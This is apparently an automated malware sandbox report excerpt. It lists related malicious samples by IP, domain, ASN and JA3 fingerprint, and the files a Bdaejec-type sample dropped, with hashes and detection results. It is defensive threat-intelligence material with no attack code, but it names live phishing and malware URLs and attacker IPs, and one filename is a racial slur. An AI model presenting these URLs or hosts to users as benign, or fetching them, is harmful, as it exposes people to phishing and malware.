                          bLvAFQEQFB.exeGet hashmaliciousCryptOne, SmokeLoaderBrowse
                          • 212.193.30.45/US/PSD_Cover300us.exe
                          File.exeGet hashmaliciousRedLineBrowse
                          • 212.193.30.45/proxies.txt

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          pastebin.com25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                          • 104.20.3.235
                          88YW43jlqt.exeGet hashmaliciousDCRatBrowse
                          • 172.67.19.24
                          installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                          • 104.20.3.235
                          aabJ5lAG3l.docGet hashmaliciousUnknownBrowse
                          • 104.20.3.235
                          updater.exeGet hashmaliciousXmrigBrowse
                          • 104.20.4.235
                          DeqcE30sLb.exeGet hashmaliciousDCRatBrowse
                          • 172.67.19.24
                          Mx0UGSI897.exeGet hashmaliciousDCRatBrowse
                          • 104.20.3.235
                          eE1xnwas4F.exeGet hashmaliciousLummaCBrowse
                          • 104.20.3.235
                          conhost.exeGet hashmaliciousXmrigBrowse
                          • 104.20.3.235
                          SecuriteInfo.com.Win64.Evo-gen.29709.21053.exeGet hashmaliciousUnknownBrowse
                          • 104.20.3.235
                          wfsdragon.ruTrojan-Spy.Win32.Stealer.aawf-427b5d1b32a8e17.exeGet hashmaliciousBackstage Stealer, FFDroider, Glupteba, Metasploit, PrivateLoader, Raccoon Stealer v2, RedLineBrowse
                          • 104.21.5.208
                          Trojan.Win32.Agentb.krec-5c97c35e6537283493bb.exeGet hashmaliciousFabookie, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, VidarBrowse
                          • 172.67.133.215
                          HEUR-Trojan.Win32.Chapak.gen-774ae4107d461361.exeGet hashmaliciousAmadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, TofseeBrowse
                          • 172.67.133.215
                          66BF743BABAD7405D2426B25BF8D1BB493F6D9048B55E.exeGet hashmaliciousRaccoon Stealer v2, RedLine, SmokeLoader, Socelars, onlyLoggerBrowse
                          • 172.67.133.215
                          HEUR-Trojan.Win32.Bsymem.gen-493aea7196b43b77.exeGet hashmaliciousAmadey, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                          • 104.21.5.208
                          273F433BA1CEBFAD830E52490A04CA744351FC4624928.exeGet hashmaliciousPrivateLoader, RedLine, SocelarsBrowse
                          • 172.67.133.215
                          HEUR-Trojan.Win32.Chapak.gen-c82a55fdd3caeb95.exeGet hashmaliciousAmadey, Fabookie, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                          • 172.67.133.215
                          009206D0BB95A4DBEF8A24AD9D75434E0DC86CAABA9F0.exeGet hashmaliciousNymaim, PrivateLoader, RedLine, Vidar, Xmrig, onlyLoggerBrowse
                          • 104.21.5.208
                          DC812FA1AE68DFA017CFDE268E2AE523019308B102BCE.exeGet hashmaliciousPrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRATBrowse
                          • 172.67.133.215
                          DAD9E695E9F592E48326DD349556F81987C115AD152BF.exeGet hashmaliciousFabookie, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRATBrowse
                          • 104.21.5.208
                          telegram.orgrPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 149.154.167.220
                          z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                          • 149.154.167.220
                          Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                          • 149.154.167.220
                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 149.154.167.220
                          231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                          • 149.154.167.220
                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 149.154.167.220
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 149.154.167.220
                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                          • 149.154.167.220
                          List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 149.154.167.220
                          Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 149.154.167.220

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SPD-NETTRwO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                          • 45.158.226.175
                          pVwXSHLriO.elfGet hashmaliciousMirai, MoobotBrowse
                          • 45.67.86.157
                          na.elfGet hashmaliciousMiraiBrowse
                          • 185.118.141.106
                          nigga.shGet hashmaliciousMiraiBrowse
                          • 45.12.96.123
                          rc2G4fAIY4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          QzNtWxCnZh.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          dqVusfiLPV.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Linux.Siggen.9999.6736.22177.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Trojan.GenericKD.65594079.25944.10510.exeGet hashmaliciousAgentTesla, RHADAMANTHYSBrowse
                          • 212.193.30.32
                          tyG9Ou5NOn.exeGet hashmaliciousUnknownBrowse
                          • 185.72.8.185
                          CLOUDFLARENETUShttps://forms.office.com/r/MbTXnrrxDYGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.24.14
                          5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                          • 188.114.96.3
                          http://pub-18c0b230f8f2453bbc80499dbfd675b4.r2.devGet hashmaliciousUnknownBrowse
                          • 104.17.247.203
                          Millich Law.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.95.41
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                          • 104.17.25.14
                          http://redapplelaw.redappledigitalsolutions.com/auth/registerGet hashmaliciousUnknownBrowse
                          • 104.26.1.216
                          http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VdXQvrvE9q5c82BetVgY4Tn_3vzvYophOo2JT7xoV-WSpIvcZOkxKRXavgDLqT8WDs81Kxwhn4ndaTj0SIW8pbE34PI3c8z85y8KF4b-3ctNBArb85FAtL-FvZ40umZH9aQETjMP7rTEiG1euALUwnOXxEOVey2ATbLesbQR6xxXmVQHnmd4pAMEpmvli0DXS3xWhmye0azQAc3gRlzrGWVUMzqfQog2yJQHz6Mdmf6a4nCgejh2JKgdwU-dC7d7RpcWEcgULfqQmicxg_xKRYc1aJrR3j1E3jT9fZxZO7WhDsQCbeMl8Mpj69s5RbxkO_huRS08Z3pfl78-scr41jA/47y/YxEtkvUcQDyArHo9NWTE1A/h6/h001.EMfOFVR5jhkE5RSbP1E9Z3FDv6QlJukJxLDJqd6igsM#DB87@OFSOPTICS.COMGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.69.40
                          SPD-NETTRwO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                          • 45.158.226.175
                          pVwXSHLriO.elfGet hashmaliciousMirai, MoobotBrowse
                          • 45.67.86.157
                          na.elfGet hashmaliciousMiraiBrowse
                          • 185.118.141.106
                          nigga.shGet hashmaliciousMiraiBrowse
                          • 45.12.96.123
                          rc2G4fAIY4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          QzNtWxCnZh.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          dqVusfiLPV.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Linux.Siggen.9999.6736.22177.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Trojan.GenericKD.65594079.25944.10510.exeGet hashmaliciousAgentTesla, RHADAMANTHYSBrowse
                          • 212.193.30.32
                          tyG9Ou5NOn.exeGet hashmaliciousUnknownBrowse
                          • 185.72.8.185
                          CLOUDFLARENETUShttps://forms.office.com/r/MbTXnrrxDYGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.24.14
                          5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                          • 188.114.96.3
                          http://pub-18c0b230f8f2453bbc80499dbfd675b4.r2.devGet hashmaliciousUnknownBrowse
                          • 104.17.247.203
                          Millich Law.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.95.41
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                          • 104.17.25.14
                          http://redapplelaw.redappledigitalsolutions.com/auth/registerGet hashmaliciousUnknownBrowse
                          • 104.26.1.216
                          http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VdXQvrvE9q5c82BetVgY4Tn_3vzvYophOo2JT7xoV-WSpIvcZOkxKRXavgDLqT8WDs81Kxwhn4ndaTj0SIW8pbE34PI3c8z85y8KF4b-3ctNBArb85FAtL-FvZ40umZH9aQETjMP7rTEiG1euALUwnOXxEOVey2ATbLesbQR6xxXmVQHnmd4pAMEpmvli0DXS3xWhmye0azQAc3gRlzrGWVUMzqfQog2yJQHz6Mdmf6a4nCgejh2JKgdwU-dC7d7RpcWEcgULfqQmicxg_xKRYc1aJrR3j1E3jT9fZxZO7WhDsQCbeMl8Mpj69s5RbxkO_huRS08Z3pfl78-scr41jA/47y/YxEtkvUcQDyArHo9NWTE1A/h6/h001.EMfOFVR5jhkE5RSbP1E9Z3FDv6QlJukJxLDJqd6igsM#DB87@OFSOPTICS.COMGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.69.40
                          SPD-NETTRwO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                          • 45.158.226.175
                          pVwXSHLriO.elfGet hashmaliciousMirai, MoobotBrowse
                          • 45.67.86.157
                          na.elfGet hashmaliciousMiraiBrowse
                          • 185.118.141.106
                          nigga.shGet hashmaliciousMiraiBrowse
                          • 45.12.96.123
                          rc2G4fAIY4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          QzNtWxCnZh.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          dqVusfiLPV.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Linux.Siggen.9999.6736.22177.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Trojan.GenericKD.65594079.25944.10510.exeGet hashmaliciousAgentTesla, RHADAMANTHYSBrowse
                          • 212.193.30.32
                          tyG9Ou5NOn.exeGet hashmaliciousUnknownBrowse
                          • 185.72.8.185

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          VaajyQsbTV.exeGet hashmaliciousGhostRat, NitolBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          PXTCFXKM.exeGet hashmaliciousLummaCBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          RQTMGXIK.msiGet hashmaliciousLummaCBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          szw3yovpYg.exeGet hashmaliciousUnknownBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          Snort_2_9_20_Installer.x64.exeGet hashmaliciousLummaCBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          BXMWTJmc5L.exeGet hashmaliciousUnknownBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          Gw47LwivS6.exeGet hashmaliciousUnknownBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          M7RrbN4DTk.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 149.154.167.99
                          • 104.20.4.235
                          1a14cfb6dc3766a34333fa7bbc8b1e912302ce0e550809266dd3f763fb719ed6.exeGet hashmaliciousBdaejecBrowse
                          • 149.154.167.99
                          • 104.20.4.235

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\vXQpuA.exe5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                            5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                              58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exeGet hashmaliciousBdaejec, RedLineBrowse
                                  56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exeGet hashmaliciousBdaejec, RedLineBrowse
                                    54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                      55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exeGet hashmaliciousBdaejec, RedLineBrowse
                                        550F.exeGet hashmaliciousBdaejecBrowse
                                          4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                            537C7A26CE5E39643B98D9C078A14D5E955F0FCCF49073D05B1F8E3294636B41.exeGet hashmaliciousBdaejecBrowse

                                              Created / dropped Files

                                              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):19456
                                              Entropy (8bit):6.5907204196107125
                                              Encrypted:false
                                              SSDEEP:384:1FSSpXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:znQGPL4vzZq2o9W7GsxBbPr
                                              MD5:572AA6C32C5BFD19EB6D8E31FBEB4061
                                              SHA1:61805C83DB4EF745674A4822B8EE4D8FBA445595
                                              SHA-256:E8E371987EE3C41D86716DE7768DBA5849E8D25C3A1E04F9F25D1C8E964A4F78
                                              SHA-512:A672D36A1D6432DE8D1F4092A2751D64C4C19EEA0787E2FA526E43375930C6EC1B9AE8D748F1A86F8EA742A21114FE65C7756B4BACDF2DF82FD7BC74EADA5168
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):2389504
                                              Entropy (8bit):6.731351098671059
                                              Encrypted:false
                                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                              MD5:B93A7469EAF49752A9909402F9211F1C
                                              SHA1:D91FB0E3E3A0C856BF57824D28478CB3797C34A5
                                              SHA-256:A7F82F88671D992F6C8BE764D1C3301A9C274036E76FD84FC712B833E6CAE7C7
                                              SHA-512:422B9FE42EB307C67C72D2048CE4CED1DD129C92FFAD563B24EF521E2D1DA7F0D802708D814DB9A1110578C4860C341EE34DC2D6714EB79C5B5463D1237281A3
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                                              C:\Program Files\7-Zip\Uninstall.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):31744
                                              Entropy (8bit):6.36671338686422
                                              Encrypted:false
                                              SSDEEP:768:uWQ3655Kv1X/qY1MSdrGQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdrdGCq2iW7z
                                              MD5:F48416BDA08FFA6824D4D021BE48D604
                                              SHA1:1F0E2EAF0EDC1E4293F51E8DD741CDB56A395906
                                              SHA-256:0996CBFD765BC4F3AB17A90591A437551BC96678CB28E59548A4E8355D9D0C82
                                              SHA-512:E3996263F01432BC29717C53D313F988A2196D0D8BA59AC1287AA1DDD56CCC0A66314E430A505971B3F2A5D7CE9A7B4650F19709CB900484010D3AEF79EE0845
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vXQpuA.exe_c0ab9b32b5e72e97aab4b6e052563fe8d013f74a_f464d7f9_f51f480b-55ae-40e3-900a-fc3318971448\Report.wer

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9103403648235437
                                              Encrypted:false
                                              SSDEEP:96:jpF6Rzbr9sOhn07afzQXIDcQpc6dcE3cw3iW+HbHg/5ksS/YyNlIcIPkShH+DOyI:VA1br9C0nZ9mHjE/nzuiFVZ24IO8Je
                                              MD5:3255A232802366A7D926720164A16B3E
                                              SHA1:F05E75718F89565342600467BEC2235CF12B7A90
                                              SHA-256:9201179333DE6F9414D1C2A93A3F4AE204FBF7028B79D3A99A349E7F9B56669B
                                              SHA-512:4F0573B65D034E5C41AA783F7A6669762FA01A1A853B3AA4268D4B3CD4B4EFE436C58B8AF610A5AB1EA1972D015C638E2D96A7CEDC9BC4FFC777ACF6EE308AF5
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.4.1.5.1.4.8.3.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.4.1.5.6.0.1.4.3.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.1.f.4.8.0.b.-.5.5.a.e.-.4.0.e.3.-.9.0.0.a.-.f.c.3.3.1.8.9.7.1.4.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.f.9.4.3.f.2.-.a.3.f.6.-.4.c.3.f.-.b.a.9.c.-.6.6.f.3.d.a.1.4.9.c.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.X.Q.p.u.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.8.-.0.0.0.1.-.0.0.1.4.-.5.c.d.e.-.5.8.e.7.d.d.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.6.f.d.3.d.f.1.6.f.b.5.1.5.f.6.d.5.6.4.5.1.c.3.1.1.9.2.6.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.v.X.Q.p.u.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC2A.tmp.dmp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jul 24 15:26:55 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):147708
                                              Entropy (8bit):1.6876662396078015
                                              Encrypted:false
                                              SSDEEP:384:1Oj+OlfBowTzKFFd9G/A9Kt1bOEd8RFNKzS71CjMbVTpynAVQh:1krfBowT1I4zlqFqS71CjMbVTpynC
                                              MD5:1C7A7981C47E63DFCC423BC9585FB26A
                                              SHA1:16009A071D566ECE7222352DB6C575CE319CB725
                                              SHA-256:F9B2A57213BCE85C36B3481BB12FEA6EA034E358B6ACCB313559E3068E4582D6
                                              SHA-512:CA59C02F05B1F133AAE63E139E157C70CACAE55F3B87B620B0ADE65FBCB2FDCD226C39723DAE087C7344B39A6DD0AB174BE526A4EAD88E5E3E37816F73E22DE3
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......?..f............D...............L...........ZH..........T.......8...........T............5..T...........L...........8...............................................................................eJ..............GenuineIntel............T...........9..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD35.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8370
                                              Entropy (8bit):3.704133213465768
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJla6uG6YjJ6WgmfmJd7pDG89b/Isf61m:R6lXJ46H6YN6WgmfmzB/7fR
                                              MD5:15E09E59A12BA72BBEB5DA58E752DD63
                                              SHA1:D6D7405DF224EA6D462AE7210C90442F0FCBDD4C
                                              SHA-256:BCC7FEB1A666DA1AC1E823A4F507BCBAF5FB31D55BBD1815E048BA2F09605E1B
                                              SHA-512:5F6C09B539FE18D70858A8C9B075A96637AAED14A6C435FA8E36F9F834422BB50ACA51177672B5FB1D694831AC1E3D59D1A5CA565E6588B3423365CB0EA4972D
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.4.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD55.tmp.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4551
                                              Entropy (8bit):4.45225027094147
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsKiJg77aI9f8WpW8VYnHYm8M4JASFY+q8uMNWTpg65d:uIjfjI7Z17VQaJmVTpg65d
                                              MD5:DC9054E1EBE5DC9BA7901543135A5AD1
                                              SHA1:6544A323CB37BD9ECC39E84FF183E3B0744C6B10
                                              SHA-256:8619154F69CCC632CB1D3B0192F00AEDA0E083A8F2BEE101ECEF5024C91C0C6C
                                              SHA-512:F7E9DD104307B5CF22098068B8C74B8BFCD990CA26DA676D79267ABBF66F690803675CC186B0F0FD98B19F274996F400715609776C1D4A4C1F9A0E5039A88018
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425189" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\Users\user\AppData\Local\Temp\vXQpuA.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):15872
                                              Entropy (8bit):7.031075575407894
                                              Encrypted:false
                                              SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                              MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                              SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                              SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                              SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
                                              Joe Sandbox View:
